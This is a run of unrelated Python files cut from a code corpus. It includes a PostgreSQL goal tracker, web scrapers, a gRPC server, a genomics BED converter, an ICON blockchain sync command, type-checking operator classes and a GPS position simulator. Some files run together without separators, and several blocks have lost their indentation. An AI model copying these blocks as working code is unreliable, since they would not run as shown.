            self.connection.commit()
            return True
        except (Exception, psycopg2.Error) as error:
            print("Error while connecting to PostgreSQL", error)
            return False

    def pretty_print_goals(self, results):
        """Print 'repeat' goals from *results* with an ASCII progress bar.

        'epic' goals are classified but not yet rendered (TODO in the original
        code). Does nothing when *results* is empty.
        """
        if not results:
            return
        print("\n Here are your tickets: \n")
        # BUG FIX: the original `repeat = epic = list()` bound BOTH names to
        # the same list, so every epic goal was also printed as a repeat goal.
        repeat = []
        epic = []
        for row in results:
            if row[7] == "repeat":
                repeat.append(row)
            elif row[7] == "epic":
                epic.append(row)
        for goal in repeat:
            id = goal[0]
            title = goal[1]
            notes = goal[2]
            count = goal[4]
            counts_done = goal[5]
            tag = goal[6]
            goal_type = goal[7]
            print("* Ticket:")
            print("  {} | ID: {} | Tag: {} | Goal Type: {}".format(title, id, tag, goal_type))
            print("  Notes: \n  {}".format(notes))
            # [***---]: one '*' per completed count, '-' for the remainder.
            progress_bar = "[" + "*" * counts_done + "-" * (count - counts_done) + "]"
            print("  Progress: \n  {}".format(progress_bar))

    def show(self):
        """Print all incomplete goals, honoring the current tag filter.

        Returns True on success, False on DB error.
        """
        try:
            cursor = self.connection.cursor()
            # Single tag check (the original tested self.tag twice).
            if self.tag != "all":
                incomplete = f"SELECT * FROM {self.list} WHERE completed = FALSE AND tag = %s"
                cursor.execute(incomplete, [self.tag])
            else:
                incomplete = f"SELECT * FROM {self.list} WHERE completed = FALSE"
                cursor.execute(incomplete)
            result = cursor.fetchall()
            self.pretty_print_goals(result)
            return True
        except (Exception, psycopg2.Error) as error:
            print("Error while connecting to PostgreSQL", error)
            return False
from urllib.request import urlopen
from bs4 import BeautifulSoup
html = urlopen("http://www.pythonscraping.com/pages/warandpeace.html")
bs0bj = BeautifulSoup(html,"html.parser")
'''
nameList = bs0bj.findAll("span",{"class":"green"})
for name in nameList:
print(name.get_text())
headList = bs0bj.findAll({"h1","h2","h3","h4","h5","h6"})
for head in headList:
print(head.get_text())
nameList = bs0bj.findAll(text="the prince")
print(len(nameList))
print(nameList)
'''
allText = bs0bj.findAll(id="text")
print(allText[0].get_text())
|
from concurrent import futures
import grpc
from .generated import meterusage_pb2_grpc
from .meterusage.service import MeterUsageService
class Server:
    """Bootstraps the gRPC endpoint that serves MeterUsageService."""

    @staticmethod
    def run():
        """Start the service on port 50051 and block until termination."""
        # Handle up to 10 RPCs concurrently.
        executor = futures.ThreadPoolExecutor(max_workers=10)
        grpc_server = grpc.server(executor)
        meterusage_pb2_grpc.add_MeterUsageServiceServicer_to_server(
            MeterUsageService(), grpc_server
        )
        # Plaintext (no TLS) endpoint on all interfaces, IPv4 and IPv6.
        grpc_server.add_insecure_port("[::]:50051")
        grpc_server.start()
        grpc_server.wait_for_termination()
if __name__ == "__main__":
    # Start serving (blocks until the process is terminated).
    Server.run()
|
'''
This script read AJHG table and convert it into a bed file,
listing 20kbp region around the eQTL site.
'''
import sys
from itertools import islice
def main(filename):
    """Convert an AJHG eQTL table into a BED file of 20 kb windows.

    Reads the tab-separated table *filename* (first row is a header) and
    writes ``filename + "_converted.bed"`` with one line per eQTL:
    ``chr<col4>  pos-10000  pos+10000  <col0>  0  <col6>`` where ``pos`` is
    column 5. Processing stops at the first site closer than 10 kb to the
    chromosome start (its window would have a negative coordinate), matching
    the original behavior. Prints the number of converted lines.
    """
    count = 0
    # `with` guarantees both handles are closed (the original leaked them).
    with open(filename, "r") as filein, \
         open(filename + "_converted.bed", "w") as fileout:
        # islice(..., 1, None) skips the header row.
        for line in islice(filein, 1, None):
            elements = line.strip().split("\t")
            if (float(elements[5]) - 10000) < 0:
                # Was: print "FUCK" -- replaced with an informative message.
                print("position %s is less than 10kb from the chromosome start; stopping" % elements[5])
                break
            pos = int(elements[5])
            fileout.write("chr" + elements[4] + "\t" + str(pos - 10000) + "\t" +
                          str(pos + 10000) + "\t" + elements[0] + "\t0\t" +
                          elements[6] + "\n")
            count += 1
    print(count)
if __name__ == "__main__":
    # argv[1]: path of the AJHG table to convert.
    main(sys.argv[1])
# import logging
# import os
#
# import pandas as pd
# import pytest
#
# import core.finance as fin
# import helpers.git as git
# import helpers.system_interaction as si
# import helpers.unit_test as hut
# import vendors.cme.reader as cmer
# import vendors.core.base_classes as etl_base
# import vendors.core.config as etl_cfg
# import vendors.csi.reader as csir
# import vendors.etfs.utils as etfut
# import vendors.first_rate.reader as frr # type: ignore
# import im.kibot.utils as kut
# import vendors.pandas_datareader.utils as pdut # type: ignore
#
## #############################################################################
## kibot/utils.py
## #############################################################################
#
#
# class Test_kibot_utils1(hut.TestCase):
# @pytest.mark.slow
# def test_read_data_pq1(self) -> None:
# # TODO(gp): Use unit test cache.
# ext = "pq"
# nrows = 100
# df = kut.read_data("T", "expiry", "ES", ext=ext, nrows=nrows)
# _LOG.debug("df=%s", df.head())
# #
# df2 = kut.read_data(
# "T", "expiry", "ES", ext=ext, nrows=nrows, cache_data=True
# )
# _LOG.debug("df2=%s", df2.head())
# pd.testing.assert_frame_equal(df, df2)
# #
# df3 = kut.read_data(
# "T", "expiry", "ES", ext=ext, nrows=nrows, cache_data=True
# )
# _LOG.debug("df3=%s", df3.head())
# pd.testing.assert_frame_equal(df, df3)
# #
# self.check_string(hut.convert_df_to_string(df, index=True))
#
# @pytest.mark.slow
# def test_read_data_csv1(self) -> None:
# # TODO(gp): Use unit test cache.
# ext = "csv"
# nrows = 100
# df = kut.read_data("T", "expiry", "ES", ext=ext, nrows=nrows)
# _LOG.debug("df=%s", df.head())
# #
# df2 = kut.read_data(
# "T", "expiry", "ES", ext=ext, nrows=nrows, cache_data=True
# )
# _LOG.debug("df2=%s", df2.head())
# pd.testing.assert_frame_equal(df, df2)
# #
# df3 = kut.read_data(
# "T", "expiry", "ES", ext=ext, nrows=nrows, cache_data=True
# )
# _LOG.debug("df3=%s", df3.head())
# pd.testing.assert_frame_equal(df, df3)
# #
# self.check_string(hut.convert_df_to_string(df, index=True))
#
# @pytest.mark.skip(reason="PTask2117")
# def test_read_metadata1(self) -> None:
# df = kut.read_1min_contract_metadata()
# self.check_string(hut.convert_df_to_string(df))
#
# @pytest.mark.skip(reason="PTask2117")
# def test_read_metadata2(self) -> None:
# df = kut.read_daily_contract_metadata()
# self.check_string(hut.convert_df_to_string(df))
#
# def test_read_metadata3(self) -> None:
# df = kut.read_tickbidask_contract_metadata()
# self.check_string(hut.convert_df_to_string(df))
#
# def test_read_metadata4(self) -> None:
# df = kut.read_continuous_contract_metadata()
# self.check_string(hut.convert_df_to_string(df))
#
#
## TODO(gp, Julia): Fix this.
## TODO(gp, Julia): Remove pylint disable after fix.
## pylint: disable=no-member
# @pytest.mark.skip(reason="# TODO(Julia): Enable this once #532 is fixed.")
# class Test_kibot_MonthExpiry1(hut.TestCase):
# """
# Test the logic comparing and processing expiry contracts, e.g., ESH19
# """
#
# def test_less1(self) -> None:
# act = kut._less("U10", "V11")
# self.assertEqual(act, "U10")
#
# def test_less2(self) -> None:
# act = kut._less("U10", "U11")
# self.assertEqual(act, "U10")
#
# def test_less3(self) -> None:
# act = kut._less("V10", "U10")
# self.assertEqual(act, "U10")
#
#
## pylint: enable=no-member
#
#
# class Test_kibot_utils_ExpiryContractMapper1(hut.TestCase):
# """
# Test parsing expiry contracts and sorting them.
# """
#
# def test_parse_expiry_contract_with_year1(self) -> None:
# contract = "SFF19"
# expected_result = ("SF", "F", "19")
# actual_result = kut.ExpiryContractMapper.parse_expiry_contract(contract)
# self.assertTupleEqual(actual_result, expected_result)
#
# def test_parse_expiry_contract_with_year2(self) -> None:
# contract = "SF19"
# expected_result = ("S", "F", "19")
# actual_result = kut.ExpiryContractMapper.parse_expiry_contract(contract)
# self.assertTupleEqual(actual_result, expected_result)
#
# def test_parse_expiry_contract_without_month(self) -> None:
# contract = "S19"
# with self.assertRaises(AssertionError):
# kut.ExpiryContractMapper.parse_expiry_contract(contract)
#
# def test_parse_expiry_contract_without_expiry(self) -> None:
# contract = "S"
# with self.assertRaises(AssertionError):
# kut.ExpiryContractMapper.parse_expiry_contract(contract)
#
# def test_parse_expiry_contract_without_year(self) -> None:
# contract = "SF"
# with self.assertRaises(AssertionError):
# kut.ExpiryContractMapper.parse_expiry_contract(contract)
#
# def test_sort_expiry_contract_year(self) -> None:
# contracts = ["JYF19", "JYF09", "JYF10"]
# expected_result = ["JYF09", "JYF10", "JYF19"]
# actual_result = kut.ExpiryContractMapper.sort_expiry_contract(contracts)
# self.assertListEqual(actual_result, expected_result)
#
# def test_sort_expiry_contract_month(self) -> None:
# contracts = ["JYF19", "JYK19", "JYH19"]
# expected_result = ["JYF19", "JYH19", "JYK19"]
# actual_result = kut.ExpiryContractMapper.sort_expiry_contract(contracts)
# self.assertListEqual(actual_result, expected_result)
#
# def test_sort_expiry_contract_month_year(self) -> None:
# contracts = ["JYF19", "JYH15", "JYK10"]
# expected_result = ["JYK10", "JYH15", "JYF19"]
# actual_result = kut.ExpiryContractMapper.sort_expiry_contract(contracts)
# self.assertListEqual(actual_result, expected_result)
#
#
# class Test_kibot_utils_KibotMetadata(hut.TestCase):
# @pytest.mark.slow()
# def test_get_metadata1(self) -> None:
# kmd = kut.KibotMetadata()
# df = kmd.get_metadata()
# self.check_string(df.to_string())
#
# @pytest.mark.slow()
# def test_get_futures1(self) -> None:
# kmd = kut.KibotMetadata()
# futures = kmd.get_futures()
# self.check_string(" ".join(map(str, futures)))
#
# @pytest.mark.slow()
# def test_get_metadata_tick1(self) -> None:
# kmd = kut.KibotMetadata()
# df = kmd.get_metadata("tick-bid-ask")
# str_df = hut.convert_df_to_string(df)
# self.check_string(str_df)
#
# @pytest.mark.slow()
# def test_get_futures_tick1(self) -> None:
# kmd = kut.KibotMetadata()
# futures = kmd.get_futures("tick-bid-ask")
# self.check_string(" ".join(map(str, futures)))
#
# def test_get_expiry_contract1(self) -> None:
# expiries = kut.KibotMetadata.get_expiry_contracts("ES")
# self.check_string(" ".join(expiries))
#
#
# class Test_kibot_utils_ContractSymbolMapping(hut.TestCase):
# def test_get_contract1(self) -> None:
# csm = kut.ContractSymbolMapping()
# contract = csm.get_contract("CL")
# self.assertEqual(contract, "NYMEX:CL")
#
# def test_get_contract2(self) -> None:
# csm = kut.ContractSymbolMapping()
# contract = csm.get_contract("BZ")
# self.assertEqual(contract, "NYMEX:BZT")
#
# def test_get_kibot_symbol1(self) -> None:
# csm = kut.ContractSymbolMapping()
# symbol = csm.get_kibot_symbol("NYMEX:CL")
# self.assertEqual(symbol, "CL")
#
# def test_get_kibot_symbol2(self) -> None:
# """
# Test for `ICE:T` contract.
#
# `ICE:T` is mapped to multiple symbols, we pick one in the code.
# """
# csm = kut.ContractSymbolMapping()
# symbol = csm.get_kibot_symbol("ICE:T")
# self.assertEqual(symbol, "CRD")
#
# def test_get_kibot_symbol3(self) -> None:
# """
# Test for `CME:ZC` contract.
#
# `CME:ZC` is mapped to multiple symbols.
# """
# csm = kut.ContractSymbolMapping()
# symbols = csm.get_kibot_symbol("CBOT:ZC")
# expected_result = ["COR", "CCM", "CA", "C"]
# self.assertListEqual(sorted(symbols), sorted(expected_result))
#
# def test_get_kibot_symbol4(self) -> None:
# """
# Test for `NYMEX:BZT` contract.
#
# `NYMEX:BZT` is mapped to multiple symbols.
# """
# csm = kut.ContractSymbolMapping()
# symbols = csm.get_kibot_symbol("NYMEX:BZT")
# expected_result = ["B", "Z"]
# self.assertListEqual(sorted(symbols), sorted(expected_result))
#
#
# class TestComputeRet0FromMultiplePrices1(hut.TestCase):
# def test1(self) -> None:
# # Read multiple futures.
# symbols = tuple("CL NG RB BZ".split())
# nrows = 100
# min_price_dict_df = kut.read_data("D", "continuous", symbols, nrows=nrows)
# # Calculate returns.
# mode = "pct_change"
# col_name = "close"
# actual_result = fin.compute_ret_0_from_multiple_prices(
# min_price_dict_df, col_name, mode
# )
# self.check_string(actual_result.to_string())
#
#
## #############################################################################
## pandas_datareader/utils.py
## #############################################################################
#
#
# class Test_pandas_datareader_utils1(hut.TestCase):
# def test_get_multiple_data1(self) -> None:
# ydq = pdut.YahooDailyQuotes()
# tickers = "SPY IVV".split()
# df = ydq.get_multiple_data("Adj Close", tickers)
# #
# self.check_string(hut.get_df_signature(df))
|
# -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING, Optional
from .command import Command
from ..libs.state_database_reader import StateDatabaseReader
from ..fastsync.icon_service_syncer import IconServiceSyncer
if TYPE_CHECKING:
from iconservice.base.block import Block
class CommandFastSync(Command):
    """``fastsync`` CLI sub-command: replay loopchain block data into the
    ICON Service state DB.

    ``__init__`` only registers the argument parser; the actual work happens
    in :meth:`run`, which argparse dispatches to via ``set_defaults``.
    """

    def __init__(self, sub_parser, common_parser):
        self.add_parser(sub_parser, common_parser)

    def add_parser(self, sub_parser, common_parser):
        """Register the ``fastsync`` sub-parser and all of its CLI options."""
        name = "fastsync"
        desc = "Synchronize ICON Service statedb with compact block db"
        mainnet_builtin_score_owner = "hx677133298ed5319607a321a38169031a8867085c"
        # create the parser for the 'fastsync' command
        parser = sub_parser.add_parser(name, parents=[common_parser], help=desc)
        parser.add_argument(
            "-s", "--start", type=int, default=-1, help="start height to sync"
        )
        parser.add_argument(
            "--end", type=int, default=-1, help="end height to sync, inclusive"
        )
        parser.add_argument(
            "-c",
            "--count",
            type=int,
            default=999999999,
            help="The number of blocks to sync",
        )
        parser.add_argument(
            "-o",
            "--owner",
            dest="builtin_score_owner",
            default=mainnet_builtin_score_owner,
            help="BuiltinScoreOwner",
        )
        parser.add_argument(
            "--stop-on-error",
            action="store_true",
            help="stop running when commit_state is different from state_root_hash",
        )
        parser.add_argument("--no-commit", action="store_true", help="Do not commit")
        parser.add_argument(
            "--write-precommit-data",
            action="store_true",
            help="Write precommit data to file",
        )
        parser.add_argument("--no-fee", action="store_true", help="Disable fee")
        # Typo fix: was "Diable audit".
        parser.add_argument("--no-audit", action="store_true", help="Disable audit")
        parser.add_argument(
            "--deployer-whitelist",
            action="store_true",
            help="Enable deployer whitelist",
        )
        parser.add_argument(
            "--score-package-validator",
            action="store_true",
            help="Enable score package validator",
        )
        parser.add_argument(
            "--channel",
            type=str,
            default="icon_dex",
            help="channel name used as a key of commit_state in block data",
        )
        parser.add_argument(
            "--backup-period",
            type=int,
            default=0,
            help="Backup statedb every this period blocks",
        )
        parser.add_argument(
            "--is-config", type=str, default="", help="iconservice_config.json filepath"
        )
        parser.add_argument(
            "--print-block-height",
            type=int,
            default=1,
            help="Print every this block height",
        )
        parser.add_argument(
            "--iiss-db-backup-path",
            dest="iiss_db_backup_path",
            type=str,
            help="Backup all IISS DBs to specified path. "
            "If IISS DB is already exists on the path, overwrite it",
        )
        # argparse calls self.run(args) when this sub-command is selected.
        parser.set_defaults(func=self.run)

    def run(self, args):
        """Execute the fast sync according to the parsed CLI *args*.

        Returns whatever ``IconServiceSyncer.run`` returns. Raises ValueError
        when --end is below the (possibly auto-detected) start height or when
        --print-block-height is not positive.
        """
        db_path: str = args.db
        start: int = args.start
        end: int = args.end
        count: int = args.count
        stop_on_error: bool = args.stop_on_error
        no_commit: bool = args.no_commit
        write_precommit_data: bool = args.write_precommit_data
        builtin_score_owner: str = args.builtin_score_owner
        fee: bool = not args.no_fee
        audit: bool = not args.no_audit
        deployer_whitelist: bool = args.deployer_whitelist
        score_package_validator: bool = args.score_package_validator
        channel: str = args.channel
        backup_period: int = args.backup_period
        iconservice_config_path: str = args.is_config
        print_block_height: int = args.print_block_height
        iiss_db_backup_path: Optional[str] = args.iiss_db_backup_path
        reader = StateDatabaseReader()
        # If --start option is not present, resume right after the last block
        # already present in statedb.
        if start < 0:
            try:
                state_db_path = ".statedb/icon_dex"
                reader.open(state_db_path)
                block: "Block" = reader.get_last_block()
                start = block.height + 1
            except Exception:
                # BUG FIX: was a bare `except:`, which also swallowed
                # SystemExit/KeyboardInterrupt. Any failure to read the last
                # block (e.g. no statedb yet) falls back to syncing from 0.
                start = 0
            finally:
                reader.close()
        if end > -1:
            if end < start:
                # BUG FIX: the original message had unbalanced parentheses:
                # f"end({end} < start({start})".
                raise ValueError(f"end({end}) < start({start})")
            # --end is inclusive and overrides --count.
            count = end - start + 1
        print(
            f"loopchain_db_path: {db_path}\n"
            f"start: {args.start}, {start}\n"
            f"end: {end}\n"
            f"count: {count}\n"
            f"fee: {fee}\n"
            f"audit: {audit}\n"
            f"deployerWhitelist: {deployer_whitelist}\n"
            f"scorePackageValidator: {score_package_validator}\n"
        )
        if print_block_height < 1:
            # Plain string (the original was an f-string with no placeholders).
            raise ValueError("print block height should be more than 0")
        syncer = IconServiceSyncer()
        try:
            syncer.open(
                config_path=iconservice_config_path,
                fee=fee,
                audit=audit,
                deployer_whitelist=deployer_whitelist,
                score_package_validator=score_package_validator,
                builtin_score_owner=builtin_score_owner,
            )
            return syncer.run(
                db_path,
                channel,
                start_height=start,
                count=count,
                stop_on_error=stop_on_error,
                no_commit=no_commit,
                write_precommit_data=write_precommit_data,
                backup_period=backup_period,
                print_block_height=print_block_height,
                iiss_db_backup_path=iiss_db_backup_path,
            )
        finally:
            syncer.close()
            print("\n")
|
from __future__ import annotations
from typing import final, Final, Tuple, Dict, Optional, List
from Core import Token, TypeSystem
from Operator import Operator
class BoolOp(Operator.Op):
    """Base class for the boolean operators (negation, and, or, xor).

    Subclasses are static namespaces: instantiation is forbidden via __new__.
    The generic chk_t below implements the binary type-checking rule shared by
    And/Or/Xor; Neg overrides both argc and chk_t for its unary case.
    """
    # Default arity for the binary boolean operators.
    __ARGC: int = 2

    def __new__(cls, *args, **kwargs) -> None:
        # Operator classes are never instantiated; they are used as namespaces.
        raise NotImplementedError

    @classmethod
    def argc(cls) -> int:
        """Return the number of operands this operator takes."""
        return cls.__ARGC

    @classmethod
    def chk_t(cls, rt: Token.Tok, t_env: Dict[int, TypeSystem.T]) -> Optional[Dict[int, TypeSystem.T]]:
        """Type-check a binary boolean operation rooted at *rt*.

        On success the result type is stored in ``rt.t`` and *t_env* is
        returned unchanged; on a type error None is returned. Four cases,
        depending on whether each operand is a base (scalar) type or an
        array type.
        NOTE(review): the semantics of TypeSystem.T.supt (common supertype,
        presumably) and ArrFact.coerce_arr_t are inferred from usage here --
        confirm against the TypeSystem module.
        """
        t1: TypeSystem.T = rt.chd[0].t
        t2: TypeSystem.T = rt.chd[1].t
        if t1.base:
            if t2.base:
                # scalar op scalar: the unified type must be Bool or Sym.
                res_t: TypeSystem.T = TypeSystem.T.supt(t1, t2)
                if type(res_t) in [TypeSystem.Bool, TypeSystem.Sym]:
                    rt.t = res_t
                else:
                    return None
            else:
                # scalar op array: unify the scalar with the array's element
                # type, then rebuild the array type around the result.
                res_t: TypeSystem.T = TypeSystem.T.supt(t1, t2.chd_t)
                if type(res_t) in [TypeSystem.Bool, TypeSystem.Sym]:
                    rt.t = TypeSystem.ArrFact.inst().coerce_arr_t(t2, res_t)
                else:
                    return None
        else:
            if t2.base:
                # array op scalar: mirror of the case above.
                res_t: TypeSystem.T = TypeSystem.T.supt(t1.chd_t, t2)
                if type(res_t) in [TypeSystem.Bool, TypeSystem.Sym]:
                    rt.t = TypeSystem.ArrFact.inst().coerce_arr_t(t1, res_t)
                else:
                    return None
            else:
                # array op array: unify the whole array types; the unified
                # element type must be Bool (Sym arrays are not combined here).
                res_t: TypeSystem.T = TypeSystem.T.supt(t1, t2)
                if res_t and type(res_t.chd_t) == TypeSystem.Bool:
                    rt.t = res_t
                else:
                    return None
        return t_env
@final
class Neg(BoolOp):
    """Unary logical negation operator ``!``."""

    # (precd_in, precd_out) precedence pair exposed via precd_in()/precd_out().
    __PRECD: Final[Tuple[int, int]] = (19, 20)
    __SYM: Final[str] = '!'
    # Human-readable signatures of the supported typings.
    __SGN: Final[List[str]] = ['!Bool -> Bool',
                               '!Sym -> Sym',
                               '!List of Bool (n fold) -> List of Bool (n fold)']
    __ARGC: Final[int] = 1  # unary: overrides BoolOp's binary default

    def __new__(cls, *args, **kwargs) -> None:
        # Operator classes are never instantiated; they are used as namespaces.
        raise NotImplementedError

    @classmethod
    def precd_in(cls) -> int:
        return cls.__PRECD[0]

    @classmethod
    def precd_out(cls) -> int:
        return cls.__PRECD[1]

    @classmethod
    def sym(cls) -> str:
        return cls.__SYM

    @classmethod
    def sgn(cls) -> List[str]:
        return cls.__SGN

    @classmethod
    def argc(cls) -> int:
        return cls.__ARGC

    @classmethod
    def chk_t(cls, rt: Token.Tok, t_env: Dict[int, TypeSystem.T]) -> Optional[Dict[int, TypeSystem.T]]:
        """Type-check ``!x``: negation preserves the operand's type.

        BUG FIX: the original always assigned ``TypeSystem.Bool.inst()`` as
        the result type, contradicting this class's own declared signatures
        (``!Sym -> Sym`` and ``!List of Bool (n fold) -> List of Bool (n
        fold)``) and the array-type handling in BoolOp.chk_t. The result type
        is now the operand type itself.
        """
        t: TypeSystem.T = rt.chd[0].t
        if t.base:
            # Scalar operand must be Bool or Sym; the result keeps that type.
            if type(t) not in [TypeSystem.Bool, TypeSystem.Sym]:
                return None
            rt.t = t
        else:
            # Array operand must hold Bools; the result keeps the array type.
            if type(t.chd_t) != TypeSystem.Bool:
                return None
            rt.t = t
        return t_env
@final
class And(BoolOp):
    """Logical conjunction operator (&)."""
    # Precedence pair; meaning of each component is defined by the parser.
    __PRECD: Final[Tuple[int, int]] = (6, 5)
    __SYM: Final[str] = '&'
    __SGN: Final[List[str]] = [
        'Bool & Bool -> Bool',
        'Sym & Sym -> Sym',
        'Bool & List of Bool (n fold) -> List of Bool (n fold)',
        'List of Bool (n fold) & Bool -> List of Bool (n fold)',
        'List of Bool (n fold) & List of Bool (n fold) -> List of Bool (n fold)',
    ]

    def __new__(cls, *args, **kwargs) -> None:
        # Namespace-style class: never instantiated.
        raise NotImplementedError

    @classmethod
    def precd_in(cls) -> int:
        """First component of the precedence pair."""
        first, _ = cls.__PRECD
        return first

    @classmethod
    def precd_out(cls) -> int:
        """Second component of the precedence pair."""
        _, second = cls.__PRECD
        return second

    @classmethod
    def sym(cls) -> str:
        """Surface symbol of the operator."""
        return cls.__SYM

    @classmethod
    def sgn(cls) -> List[str]:
        """Human-readable signatures of the operator."""
        return cls.__SGN
@final
class Or(BoolOp):
    """Logical disjunction operator (|)."""
    # Precedence pair; meaning of each component is defined by the parser.
    __PRECD: Final[Tuple[int, int]] = (4, 3)
    __SYM: Final[str] = '|'
    __SGN: Final[List[str]] = [
        'Bool | Bool -> Bool',
        'Sym | Sym -> Sym',
        'Bool | List of Bool (n fold) -> List of Bool (n fold)',
        'List of Bool (n fold) | Bool -> List of Bool (n fold)',
        'List of Bool (n fold) | List of Bool (n fold) -> List of Bool (n fold)',
    ]

    def __new__(cls, *args, **kwargs) -> None:
        # Namespace-style class: never instantiated.
        raise NotImplementedError

    @classmethod
    def precd_in(cls) -> int:
        """First component of the precedence pair."""
        first, _ = cls.__PRECD
        return first

    @classmethod
    def precd_out(cls) -> int:
        """Second component of the precedence pair."""
        _, second = cls.__PRECD
        return second

    @classmethod
    def sym(cls) -> str:
        """Surface symbol of the operator."""
        return cls.__SYM

    @classmethod
    def sgn(cls) -> List[str]:
        """Human-readable signatures of the operator."""
        return cls.__SGN
@final
class Xor(BoolOp):
    """Logical exclusive-or operator (^)."""
    # Precedence pair; meaning of each component is defined by the parser.
    __PRECD: Final[Tuple[int, int]] = (4, 3)
    __SYM: Final[str] = '^'
    __SGN: Final[List[str]] = [
        'Bool ^ Bool -> Bool',
        'Sym ^ Sym -> Sym',
        'Bool ^ List of Bool (n fold) -> List of Bool (n fold)',
        'List of Bool (n fold) ^ Bool -> List of Bool (n fold)',
        'List of Bool (n fold) ^ List of Bool (n fold) -> List of Bool (n fold)',
    ]

    def __new__(cls, *args, **kwargs) -> None:
        # Namespace-style class: never instantiated.
        raise NotImplementedError

    @classmethod
    def precd_in(cls) -> int:
        """First component of the precedence pair."""
        first, _ = cls.__PRECD
        return first

    @classmethod
    def precd_out(cls) -> int:
        """Second component of the precedence pair."""
        _, second = cls.__PRECD
        return second

    @classmethod
    def sym(cls) -> str:
        """Surface symbol of the operator."""
        return cls.__SYM

    @classmethod
    def sgn(cls) -> List[str]:
        """Human-readable signatures of the operator."""
        return cls.__SGN
|
#!/usr/bin/python
import hashlib
import hmac
import time
import os
import urllib
import urllib2
try:
import simplejson as json
except ImportError:
import json
class Auth:
    """Builds HMAC-SHA256 security headers for LLNW-style REST requests.

    Python 2 module: relies on urllib2 and str.decode('hex').
    """

    def __init__(self, apiKey):
        # apiKey: hex-encoded shared secret used to sign every request.
        self.apiKey = apiKey

    def hmac(self, url, httpMethod="GET", queryParameters=None, postData=None):
        """Return (token, timestamp) for a request.

        The token is HMAC-SHA256 over method + url [+ query string]
        + millisecond timestamp [+ post body], keyed with the hex-decoded
        API key.  The module-level `hmac` is still reachable here because
        the method name only shadows it via attribute access.
        """
        timestamp = str(int(round(time.time() * 1000)))
        datastring = httpMethod + url
        if queryParameters is not None:
            datastring += queryParameters
        datastring += timestamp
        if postData is not None:
            datastring += postData
        self.postData = postData
        self.token = hmac.new(self.apiKey.decode('hex'), msg=datastring,
                              digestmod=hashlib.sha256).hexdigest()
        return self.token, timestamp

    def GET(self, url, username, httpMethod="GET", queryParameters=None, postData=None):
        """Send a signed request and return the urllib2 response object."""
        token, timestamp = self.hmac(url, httpMethod, queryParameters, postData)
        if queryParameters is not None:
            url = url + "?" + queryParameters
        if postData is not None:
            req = urllib2.Request(url, postData)
        else:
            req = urllib2.Request(url)
        req.add_header('Content-Type', 'application/json')
        req.add_header('Accept', 'application/json')
        req.add_header('X-LLNW-Security-Principal', username)
        req.add_header('X-LLNW-Security-Timestamp', timestamp)
        req.add_header('X-LLNW-Security-Token', token)
        response = urllib2.urlopen(req)
        return response
|
#single page crawl
import scrapy
import logging
from scrapy.contrib.spiders import Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from scrapy import Request, Spider
from scrapy.exceptions import CloseSpider
from scrapy.selector import Selector
from scrapy.item import Item, Field
class ScrapySampleItem(Item):
    """Container for one scraped product (title, link, description, price, image)."""
    title = Field()
    link = Field()
    desc = Field()
    price = Field()
    image = Field()
class StackOverflowSpider(scrapy.Spider):
    """Crawls lekiaan.com category listings and scrapes each product page."""
    name = 'lekian others'
    start_urls = ["http://www.lekiaan.com/categories/storage/cid-CU00204280.aspx", "http://www.lekiaan.com/categories/display/cid-CU00204288.aspx","http://www.lekiaan.com/categories/mirrors/cid-CU00204296.aspx","http://www.lekiaan.com/categories/accessories/cid-CU00204298.aspx","http://www.lekiaan.com/categories/television-units/cid-CU00262438.aspx","http://www.lekiaan.com/categories/chairs/cid-CU00273640.aspx"]

    def parse(self, response):
        """Follow every product link found in a category listing page."""
        for href in response.css('.bucket_left a::attr(href)'):
            full_url = response.urljoin(href.extract())
            logging.info(full_url)
            yield scrapy.Request(full_url, callback=self.parse_product, dont_filter=True)

    def parse_product(self, response):
        """Extract one ScrapySampleItem from a product page."""
        item = ScrapySampleItem()
        item['title'] = response.css('h1::text').extract_first()
        item['image'] = response.css('.product-largimg::attr(src)').extract_first()
        item['desc'] = response.css('.product_desc p::text').extract()
        item['price'] = response.css('.sp_amt::text').extract_first()
        if not item['desc']:
            # Fall back to the page title when no description paragraphs exist.
            logging.info("EMPTY RECEIVED")  # typo "RECIEVED" fixed
            item['desc'] = response.css('h1::text').extract_first()
        item['link'] = response.url
        # Yield directly; the original buffered the single item in a list
        # and looped over it for no effect.
        yield item
import os
import random
import asyncio
import aiohttp
# Simulation settings -- all three environment variables are required.
num_of_drivers = int(os.environ['DRIVER_NUMBER'])          # drivers simulated per cycle
time_interval = int(os.environ['POSITION_SEND_INTERVAL'])  # seconds between send cycles
service_host = os.environ['SERVICE_HOST']                  # base URL of the position service
def generate_position(driver_id):
    """Build one random GPS fix for ``driver_id`` inside a fixed bounding box."""
    latitude = round(random.uniform(49.767749, 49.896666), 6)
    longitude = round(random.uniform(23.906237, 24.116664), 6)
    return {
        'driver_id': driver_id,
        'latitude': latitude,
        'longitude': longitude,
        'speed': random.randint(0, 120),
        'altitude': random.randint(250, 450),
    }
async def send_position(session, position):
    """POST one position record; return (HTTP status, response body text)."""
    async with session.post(f'{service_host}/positions', json=position) as resp:
        text = await resp.text()
        return resp.status, text
async def main():
    """Forever: concurrently POST one random position per driver, then sleep."""
    while True:
        # One short-lived session per cycle; all drivers' posts for a cycle
        # run concurrently via gather.
        async with aiohttp.ClientSession() as session:
            tasks = [
                send_position(session, generate_position(i))
                for i in range(num_of_drivers)
            ]
            await asyncio.gather(*tasks)
        await asyncio.sleep(time_interval)
if __name__ == '__main__':
    # asyncio.run() owns event-loop creation and teardown; it replaces the
    # deprecated get_event_loop()/run_until_complete() pair.
    asyncio.run(main())
|
"""Provides `ParamsManager` class for managing parameters folder."""
import os
import json
def _load(path):
with open(path, 'r') as f:
params = json.load(f)
return params
def _save(path, params):
with open(path, 'w') as f:
json.dump(params, f)
class ParamsManager(object):
    """Manages named JSON parameter sets stored in a single folder."""

    def __init__(self, folder, default_params=None, default_name=None):
        """
        Initialize the manager.
        Args:
            folder: folder under which this manager loads/saves parameters.
            default_params: default parameters. Can be None.
            default_name: name of default params file. Only used if
                default_params is None. Can be None.
        """
        self._folder = folder
